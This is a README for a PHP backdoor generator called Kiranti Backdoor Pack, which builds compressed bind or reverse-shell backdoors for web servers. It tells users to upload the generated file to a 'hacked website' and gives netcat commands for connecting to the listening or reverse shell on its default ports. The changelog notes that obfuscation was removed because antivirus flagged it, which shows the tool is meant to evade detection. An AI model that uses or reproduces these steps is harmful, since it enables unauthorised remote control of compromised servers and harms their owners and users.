Kiranti Backdoor Pack Version 1.1
Kiranti Backdoor Pack
Author: ./MyHeartIsyr
This is a project for backdooring webserver without using web-based shell
#How To Use
* Download this project
* Generate your own backdoor with:
$ php packer.php -o filename.php -z [gzdeflate|gzencode|gzcompress] -l [0-9] -b [bind|reverse]
-o Output Filename
-z Compression (optional)
-l Level Compression (use with -z)
-b Backdoor Type (bind connect or reverse connect)
* Upload to your hacked website and access
* We will use netcat for connect to our backdoor
for bind connect:
nc -v [server ip] 1203
for reverse connect:
nc -lvp 0907
PS: 1203 and 0907 is default port
* option -t is replaced with -z and -l
* port 4444 is replaced with 0907 (I think 4444 is being used by another service)
* obfuscated source is removed (I think Carbylamine Encoder is being recognized by antivirus)
* cool banner :D
I as the author assume no liability and not responsible for any misused this project
Unofficial documentation is in "docs" folder, 'cause it's just an unofficial documentation, don't blame on me
if the documentation can't fully leads you.
Official documentation will come soon on next release (if i can made it :P)
* Client-Server Type
* Another Features
[x] M2.M4GNuM
[x] FalahGo5
[x] All My Friends in Real Life
[x] All Indonesian Hackers
[x] You
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